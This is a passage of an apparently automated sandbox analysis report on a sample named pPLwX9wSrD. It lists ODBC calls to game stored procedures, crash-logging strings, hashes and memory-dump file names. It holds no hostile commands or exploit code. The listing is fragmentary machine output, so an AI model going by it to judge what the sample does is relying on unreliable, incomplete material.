                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: <7FJ
                                                                                      • API String ID: 0-2327259933
                                                                                      • Opcode ID: a08ffa7688d3151d32031dd77f5afd452e5f412e34b1a462a816dc666f56e2a3
                                                                                      • Instruction ID: cd9fbabd00b8f81b40c24225013c961ad787f3947d5ded4551cea174f5d3e9d9
                                                                                      • Opcode Fuzzy Hash: a08ffa7688d3151d32031dd77f5afd452e5f412e34b1a462a816dc666f56e2a3
                                                                                      • Instruction Fuzzy Hash: A49128E2C081149FE7148B64DC45AFB7778EB84311F2441BFDD0DA7242EA7C5ECA8A96
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateCharMission] (?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?)},000000FD), ref: 004421F0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044222F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00442264
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0044229C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004422D4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044230C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442344
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044237C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004423B4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004423EC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442424
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044245C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442494
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004424CC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442504
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044253C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442574
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004425AC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004425E4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044261C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442654
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044268C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004426C4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004426FC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00442734
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0044276C
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateCharMission] (?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?)}, xrefs: 004421E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateCharMission] (?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?)}
                                                                                      • API String ID: 0-2377642743
                                                                                      • Opcode ID: f0e8b9a6475f7cb8c3071bb09b50a6ecbfa59198af7319dcabb05fd9e9cd948d
                                                                                      • Instruction ID: a471fd6000be43105c4e1342dc07057f6aee67150b0ebded08a83742e617e105
                                                                                      • Opcode Fuzzy Hash: f0e8b9a6475f7cb8c3071bb09b50a6ecbfa59198af7319dcabb05fd9e9cd948d
                                                                                      • Instruction Fuzzy Hash: 2F02E470B403147BEB249B94CCA6FEA73B5EB84B94F108289F6147E6C5D6F56F408B18
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateCharTitle2] (?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?)},000000FD), ref: 0043A529
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043A568
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043A59D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043A5D5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043A60D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A645
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A67D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A6B5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A6ED
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A725
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A75D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A795
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A7CD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A805
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A83D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A875
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A8AD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A8E5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A91D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A955
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A98D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A9C5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043A9FD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043AA35
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043AA6D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043AAA5
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateCharTitle2] (?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?)}, xrefs: 0043A520
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateCharTitle2] (?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?,?,?,?,?, ?)}
                                                                                      • API String ID: 0-585469524
                                                                                      • Opcode ID: 9133ce4f38ca930fe4d87f59dcc1ee96ace4d0c17c3c697dc7b64e0232b46519
                                                                                      • Instruction ID: c5d79978eb4874b6a3fc3540ee08eddc8a0a4f1a3b1896074e0ec0ac819443ae
                                                                                      • Opcode Fuzzy Hash: 9133ce4f38ca930fe4d87f59dcc1ee96ace4d0c17c3c697dc7b64e0232b46519
                                                                                      • Instruction Fuzzy Hash: 830223B0A416547BEB748B54CC56FAA7335EB84B19F20CA84F6187F2C5D5F26D808F18
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(004E93D0,40000000,00000001,00000000,00000004,80000080,00000000,?,00000103,?,?,Function_00081850,004CB670,000000FF,?,0045DA88), ref: 0045DAEA
                                                                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 0045DB1D
                                                                                      • GetLocalTime.KERNEL32(00000000), ref: 0045DB4E
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0045DB8B
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0045DB92
                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0045DBDA
                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0045DBF7
                                                                                        • Part of subcall function 0045E0B0: CreateFileA.KERNEL32(004E92C8,40000000,00000001,00000000,00000002,80000080,00000000), ref: 0045E0CD
                                                                                      Strings
                                                                                      • %s in module %s at %04x:%08x., xrefs: 0045DCC4
                                                                                      • EAX=%08x CS=%04x EIP=%08x EFLGS=%08x, xrefs: 0045DD97
                                                                                      • Registers:, xrefs: 0045DD67
                                                                                      • EBX=%08x SS=%04x ESP=%08x EBP=%08x, xrefs: 0045DDC7
                                                                                      • Memory: total=%d, phys=%d, virtual=%d, xrefs: 0045DFF8
                                                                                      • start at %02d/%02d/%02d %02d:%02d:%02d, xrefs: 0045DC6F
                                                                                      • %#x(%d) %04d/%02d/%02d %02d:%02d:%02d> exception %d, xrefs: 0045DB99
                                                                                      • ECX=%08x DS=%04x ESI=%08x FS=%04x, xrefs: 0045DDF7
                                                                                      • %s location %08x caused an access violation., xrefs: 0045DD23
                                                                                      • Stack dump:, xrefs: 0045DED9
                                                                                      • Bytes at CS:EIP:, xrefs: 0045DE3B
                                                                                      • %02x , xrefs: 0045DE96
                                                                                      • EDX=%08x ES=%04x EDI=%08x GS=%04x, xrefs: 0045DE27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateCurrentThread$LocalModuleNamePointerQueryTimeVirtual
                                                                                      • String ID: Stack dump:$Bytes at CS:EIP:$%#x(%d) %04d/%02d/%02d %02d:%02d:%02d> exception %d$%02x $%s in module %s at %04x:%08x.$%s location %08x caused an access violation.$EAX=%08x CS=%04x EIP=%08x EFLGS=%08x$EBX=%08x SS=%04x ESP=%08x EBP=%08x$ECX=%08x DS=%04x ESI=%08x FS=%04x$EDX=%08x ES=%04x EDI=%08x GS=%04x$Memory: total=%d, phys=%d, virtual=%d$Registers:$start at %02d/%02d/%02d %02d:%02d:%02d
                                                                                      • API String ID: 4128220826-3286206852
                                                                                      • Opcode ID: 5e10af54f877a3089040104d5fe9de796bb6702254fb636212af0b80d28387f3
                                                                                      • Instruction ID: df42ad08166c1038e95bacd2af79fb655473cd6c4d2ce7eed991277bc28a21b8
                                                                                      • Opcode Fuzzy Hash: 5e10af54f877a3089040104d5fe9de796bb6702254fb636212af0b80d28387f3
                                                                                      • Instruction Fuzzy Hash: 21E1A1B1D00214ABCB64DB55DC85FDEB3B8AB49705F0085DDF609A7292D738AE84CF98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_JoinRank](?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)},000000FD), ref: 0042CAB4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042CAF3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042CB2B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CB63
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CB9B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CBD3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CC0B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CC43
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CC7B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CCB3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042CCEB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042CD23
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CD5B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CD93
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CDCB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CE03
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CE3B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CE73
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042CEAB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042CEE3
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_JoinRank](?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)}, xrefs: 0042CAAB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
